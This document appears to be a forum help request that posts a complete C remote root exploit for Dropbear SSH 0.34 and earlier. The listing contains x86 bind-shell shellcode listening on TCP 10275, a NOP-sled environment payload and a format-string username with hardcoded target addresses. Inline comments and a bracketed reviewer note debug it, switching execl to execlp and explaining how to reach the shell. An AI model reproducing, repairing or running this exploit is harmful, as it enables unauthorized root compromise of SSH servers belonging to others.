
    help with execl


    This is a program meant to gain root remotely on a machine in the network. I am using `execl` to run the `ssh` command, passing the username through the variable `fmt` along with other options (such as `-l` and `-m`; note that the listing below actually passes `-l` and `-p`). But the command still does not execute on the terminal and does not give me a shell on the other machine.

    What seems to be wrong? (Usage: `./a.out <target IP>`.)

    Code:
    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    
    
    
    
    /* Name of the ssh client to run.  This is a bare command name, not a
     * path: it only works with an exec variant that searches PATH (execlp),
     * never with execl(), which takes the string as a literal path. */
    #define SSH_PATH               "ssh" 
    
    /* Port passed to ssh with -p. */
    #define SSH_PORT               "22" 
    
    
    
    /* Positional-argument index N used in the "%N$hn" part of the username
     * format string built in main(); adjustable with -v.  The name suggests
     * it depends on the server version -- presumably, confirm per target. */
    #define DEFAULT_VERSION_PAD     24 
    
    /* Address the %hn write goes through (emitted as the first four raw bytes
     * of the username); adjustable with -l in 4-byte steps.  A fixed
     * 0xbfff.... value like this presumes a pre-ASLR i386 layout -- it will
     * not be right for any other build. */
    #define DEFAULT_RETLOC         0xbffff800 
    
    /* 16-bit value stored by %hn (the "%.<N>u" padding makes printf's output
     * counter reach it); adjustable with -r in 4-byte steps. */
    #define DEFAULT_RETADDR         0x080e /* 2 byte retaddr, not enough space for a 
    
                                          * full overwrite. */ 
    
    
    
    
    
    /* fork/bind shellcode by live
     * default port is 10275
     *
     * I believe this can be further optimized, but size is not
     * an issue here since the shellcode is sent through an
     * environment variable handed to ssh (the SHELLCODE string
     * built in main(), about 30 KB long).
     */
    
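    /*
     * Linux x86 fork/bind shellcode, 167 bytes, no NUL bytes (so strlen()
     * measures it correctly).  Reading the disassembly comments with the
     * syscall numbers loaded into %al (2 = fork, 0x66 = socketcall,
     * 0x3f = dup2, 0xb = execve, 1 = exit):
     *
     *   fork(): the parent (non-zero %eax) takes "jne 5e" -> "jmp 9a" and
     *   exit(0)s; the child takes "jmp 5c" -> "jmp a2" -> "call c", which
     *   pushes the address just past the shellcode and pops it into %esi to
     *   serve as scratch space for the socketcall argument blocks.
     *   socket(2, 1, 0); bind() to port bytes 28 23 (network order 0x2823 =
     *   10275) on address 0 (any); listen(); accept(); dup2() the accepted
     *   fd onto 0, 1 and 2; execve("/bin//sh", ...); exit(0) on return.
     *
     * main() places it at the end of the SHELLCODE environment string behind
     * a 0x90 (NOP) sled, so execution only has to land somewhere in the sled.
     */
    char shellcode[] =
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\xb0\x02"                      /* mov     $0x2,%al                */
        "\xcd\x80"                      /* int     $0x80                   */
        "\x85\xc0"                      /* test    %eax,%eax               */
        "\x75\x54"                      /* jne     5e                      */
        "\xeb\x50"                      /* jmp     5c                      */
        "\x5e"                          /* pop     %esi                    */
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\x31\xdb"                      /* xor     %ebx,%ebx               */
        "\x89\x46\x08"                  /* mov     %eax,0x8(%esi)          */
        "\xb0\x02"                      /* mov     $0x2,%al                */
        "\x89\x06"                      /* mov     %eax,(%esi)             */
        "\xfe\xc8"                      /* dec     %al                     */
        "\x89\x46\x04"                  /* mov     %eax,0x4(%esi)          */
        "\xb0\x66"                      /* mov     $0x66,%al               */
        "\xfe\xc3"                      /* inc     %bl                     */
        "\x89\xf1"                      /* mov     %esi,%ecx               */
        "\xcd\x80"                      /* int     $0x80                   */
        "\x89\x06"                      /* mov     %eax,(%esi)             */
        "\x89\x4e\x04"                  /* mov     %ecx,0x4(%esi)          */
        "\x80\x46\x04\x0c"              /* addb    $0xc,0x4(%esi)          */
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\xb0\x10"                      /* mov     $0x10,%al               */
        "\x89\x46\x08"                  /* mov     %eax,0x8(%esi)          */
        "\xb0\x02"                      /* mov     $0x2,%al                */
        "\x66\x89\x46\x0c"              /* mov     %ax,0xc(%esi)           */
        "\x66\xb8\x28\x23"              /* mov     $0x2328,%ax             */
        "\x89\x46\x0e"                  /* mov     %eax,0xe(%esi)          */
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\x89\x46\x10"                  /* mov     %eax,0x10(%esi)         */
        "\xb0\x66"                      /* mov     $0x66,%al               */
        "\xfe\xc3"                      /* inc     %bl                     */
        "\xcd\x80"                      /* int     $0x80                   */
        "\xfe\xcb"                      /* dec     %bl                     */
        "\x89\x5e\x04"                  /* mov     %ebx,0x4(%esi)          */
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\xb0\x66"                      /* mov     $0x66,%al               */
        "\xb3\x04"                      /* mov     $0x4,%bl                */
        "\xcd\x80"                      /* int     $0x80                   */
        "\xeb\x04"                      /* jmp     60                      */
        "\xeb\x44"                      /* jmp     a2                      */
        "\xeb\x3a"                      /* jmp     9a                      */
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\x89\x46\x04"                  /* mov     %eax,0x4(%esi)          */
        "\x89\x46\x08"                  /* mov     %eax,0x8(%esi)          */
        "\xb0\x66"                      /* mov     $0x66,%al               */
        "\xfe\xc3"                      /* inc     %bl                     */
        "\xcd\x80"                      /* int     $0x80                   */
        "\x31\xc9"                      /* xor     %ecx,%ecx               */
        "\x89\xc3"                      /* mov     %eax,%ebx               */
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\xb0\x3f"                      /* mov     $0x3f,%al               */
        "\xcd\x80"                      /* int     $0x80                   */
        "\xfe\xc1"                      /* inc     %cl                     */
        "\x80\xf9\x03"                  /* cmp     $0x3,%cl                */
        "\x75\xf3"                      /* jne     72                      */
        "\x68\x2f\x2f\x73\x68"          /* push    $0x68732f2f             */
        "\x68\x2f\x62\x69\x6e"          /* push    $0x6e69622f             */
        "\x89\xe3"                      /* mov     %esp,%ebx               */
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\x88\x43\x08"                  /* mov     %al,0x8(%ebx)           */
        "\x50"                          /* push    %eax                    */
        "\x53"                          /* push    %ebx                    */
        "\x89\xe1"                      /* mov     %esp,%ecx               */
        "\x89\xe2"                      /* mov     %esp,%edx               */
        "\xb0\x0b"                      /* mov     $0xb,%al                */
        "\xcd\x80"                      /* int     $0x80                   */
        "\x31\xc0"                      /* xor     %eax,%eax               */
        "\x31\xdb"                      /* xor     %ebx,%ebx               */
        "\xfe\xc0"                      /* inc     %al                     */
        "\xcd\x80"                      /* int     $0x80                   */
        "\xe8\x65\xff\xff\xff"          /* call    c <up>                  */
    ;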
    
    
    
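    /* Print banner and option summary to stderr; defined after main(). */
    static void usage(const char *progname);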
    
    
    
    
    
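    /*
     * Parse an integer option argument strictly.  atoi() returns 0 for
     * garbage without saying so, which would quietly leave retloc/retaddr
     * at their defaults; here an empty string, trailing junk or an
     * out-of-range value is reported and aborts the run.
     *
     * s:   the option argument text (decimal)
     * opt: option name used in the error message
     */
    static long parse_long(const char *s, const char *opt)
    {
        char *end;
        long v;

        errno = 0;
        v = strtol(s, &end, 10);
        if (s[0] == '\0' || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "invalid value for %s: '%s'\n", opt, s);
            exit(-1);
        }
        return v;
    }

    /*
     * Entry point: build the two halves of the payload and exec the ssh
     * client with them.
     *
     *   1. The environment string "SHELLCODE=<0x90 sled><shellcode>" is
     *      put into this process's environment with putenv().
     *      NOTE(review): that is the *local* ssh client's environment.  The
     *      SSH protocol only forwards variables the client is configured to
     *      send and the server to accept, and nothing here arranges that,
     *      so how the remote server would ever see it is not shown -- confirm
     *      before relying on it.
     *   2. The username passed with -l is a format string: four raw bytes
     *      (retloc, the address to write to), "%.<retaddr>u" to pad the
     *      output so printf's byte counter reaches the value being written,
     *      then "%<version_pad>$hn" to store that counter as a 16-bit short
     *      through the <version_pad>th positional argument.  It only does
     *      anything if the server feeds the username to a printf-style call.
     *
     * Options: -l / -r add 4-byte steps to retloc / retaddr, -v sets the
     * positional index.  Exactly one non-option argument, the target host,
     * is required; anything else prints usage and exits with -1.
     *
     * Things to know before expecting a shell:
     *   - the shellcode is a fork/bind shell, so even on success no shell
     *     appears on this terminal -- the next step is connecting to
     *     TCP/10275 on the target;
     *   - retloc/retaddr are fixed addresses for one particular 2005-era
     *     build; on a different build, with ASLR, or against a Dropbear
     *     newer than 0.34 (see usage()) nothing useful happens.
     *
     * On success the exec never returns; every failure exits with -1.
     */
    int main(int argc, char *argv[])
    {
        char buffer[29500], fmt[26], *target;
        long int retloc, retaddr;
        int ch, version_pad, n;
        size_t sc_len;
        unsigned long loc;
        unsigned char b0, b1, b2, b3;

        retloc      = DEFAULT_RETLOC + 1;
        retaddr     = DEFAULT_RETADDR - 40;
        version_pad = DEFAULT_VERSION_PAD;

        while ((ch = getopt(argc, argv, "l:r:v:")) != -1) {
            switch (ch) {
            case 'l':
                retloc += parse_long(optarg, "-l") * 4;
                break;
            case 'r':
                retaddr += parse_long(optarg, "-r") * 4;
                break;
            case 'v':
                version_pad = (int)parse_long(optarg, "-v");
                break;
            default:
                /* getopt() has already complained about the bad option. */
                usage(argv[0]);
                exit(-1);
            }
        }

        if (argc - optind != 1) {
            usage(argv[0]);
            exit(-1);
        }
        target = argv[optind];

        /*
         * Environment payload.  putenv() needs a NUL-terminated string, so
         * the last byte of buffer is reserved for the terminator and the
         * shellcode sits just in front of it.  (The original copied the
         * shellcode flush against the end of the array, leaving putenv() to
         * read past the end of this stack buffer.)
         */
        sc_len = strlen(shellcode);
        if (sc_len + 10 > sizeof buffer - 1) {
            fprintf(stderr, "shellcode (%zu bytes) does not fit the payload buffer\n", sc_len);
            exit(-1);
        }
        memset(buffer, 0x90, sizeof buffer);
        memcpy(buffer, "SHELLCODE=", 10);
        memcpy(buffer + sizeof buffer - 1 - sc_len, shellcode, sc_len);
        buffer[sizeof buffer - 1] = '\0';
        /* putenv() keeps a pointer to buffer rather than copying it; that is
         * only safe because the next step is exec or exit. */
        if (putenv(buffer) != 0) {
            perror("putenv");
            exit(-1);
        }

        /*
         * Username / format string.  The address goes in through %c, so a
         * zero byte anywhere in it would end the username early and the
         * write would never reach the intended location.
         */
        loc = (unsigned long)retloc;
        b0 = loc & 0xff;
        b1 = (loc >> 8) & 0xff;
        b2 = (loc >> 16) & 0xff;
        b3 = (loc >> 24) & 0xff;
        if (b0 == 0 || b1 == 0 || b2 == 0 || b3 == 0) {
            fprintf(stderr, "retloc 0x%08lx contains a zero byte; adjust -l\n", loc);
            exit(-1);
        }
        /* retaddr is long, so %ld (the original passed a long to %d). */
        n = snprintf(fmt, sizeof fmt, "%c%c%c%c%%.%ldu%%%d$hn",
                     (int)b0, (int)b1, (int)b2, (int)b3, retaddr, version_pad);
        if (n < 0 || (size_t)n >= sizeof fmt) {
            fprintf(stderr, "format string does not fit in fmt[%zu]; reduce -r/-v\n", sizeof fmt);
            exit(-1);
        }

        /*
         * execl() does not search PATH, and SSH_PATH is the bare name "ssh",
         * so the original exec could only work with ./ssh in the current
         * directory -- and its failure fell through to exit(0) without a
         * word, which is exactly "the command doesn't execute".  execlp()
         * resolves the name via PATH; if it still fails, say why.
         */
        execlp(SSH_PATH, "ssh", "-l", fmt, "-p", SSH_PORT, target, NULL);
        perror("execlp " SSH_PATH);
        exit(-1);
    }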
    
    
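    /*
     * Print the banner and the option summary to stderr.
     *
     * progname: argv[0], shown in the usage line.
     *
     * The banner lines end in "\n"; the listing as posted had lost the
     * backslashes ("exploitn", "livenn"), which would have run the two
     * lines and the usage line together on one line.
     */
    static void usage(const char *progname)
    {
        fprintf(stderr, "Linux x86 Dropbear SSH <= 0.34 remote root exploit\n");
        fprintf(stderr, "coded by live\n");
        fprintf(stderr, "Usage: %s [-l <retloc offset>] [-r <retaddr offset>]"
            " [-v <version pad>] <target>\n", progname);
    }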

    The problem is that ssh prompts for the password on the terminal whenever it can find one. The only way I have managed to get remote command execution working from a program was by setting up private keys. [Reviewer note: before that even matters, the listing as posted calls `execl` with the bare name `"ssh"` (`SSH_PATH`); `execl` does not search `PATH`, so unless `./ssh` exists in the current directory the exec fails and the program falls through to `exit(0)` without any message — ssh is never started. Use `execlp` or an absolute path, and check the return value. Also note the shellcode is a fork/bind shell on TCP port 10275, so even a successful run would not show a shell on the ssh terminal.]
